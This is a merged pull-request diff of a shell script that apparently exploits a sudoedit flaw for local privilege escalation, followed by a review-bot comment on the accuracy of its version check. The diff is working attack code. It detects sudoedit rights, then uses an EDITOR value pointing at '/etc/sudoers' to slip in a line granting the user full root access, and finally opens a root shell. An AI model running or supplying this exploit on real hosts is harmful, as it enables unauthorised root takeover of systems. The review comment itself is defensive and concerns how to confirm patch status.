Merge pull request #1 from r3nt0n/main

Fixing bugs and improving checks
Martín
2023-02-03 13:03:07 +01:00
committed by GitHub


@@ -18,15 +18,24 @@
# attacker to add a line to gain privileges on all the files and get a root # attacker to add a line to gain privileges on all the files and get a root
# shell. # shell.
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-) if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then if [ -z "$EXPLOITABLE" ]; then
echo "> This user can't run sudoedit as root" echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else else
echo "> BINGO! User exploitable" echo "> BINGO! User exploitable"
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL" echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..." read -n 1 -s -r -p "Press any key to continue..."
EDITOR = "vim -- /etc/suoders" $EXPLOITABLE EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root sudo su root
exit 0
fi fi
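Review bot: The message `> Currently installed sudo version is not vulnerable` in the added version check claims more than the check establishes. The test matches only the upstream version string printed by `sudo --version`, and distributions often backport fixes without changing that string, so a match does not prove exposure. In the other direction, the alternative `1\.9\.[0-9]1?` does not match a string ending in `1.9.10`, so if the intended range is continuous up to `1.9.12p1`, as the last alternative suggests, such a release would be reported as not vulnerable. Anyone using this output to judge a host's patch state should confirm it against the distribution's advisory and package changelog, and the message could say so: `echo "> sudo version string is outside the range this script checks; confirm patch status with your distribution's advisory"`. The script starts above this hunk, so the interpreter line and the rest of the header comment are not visible here.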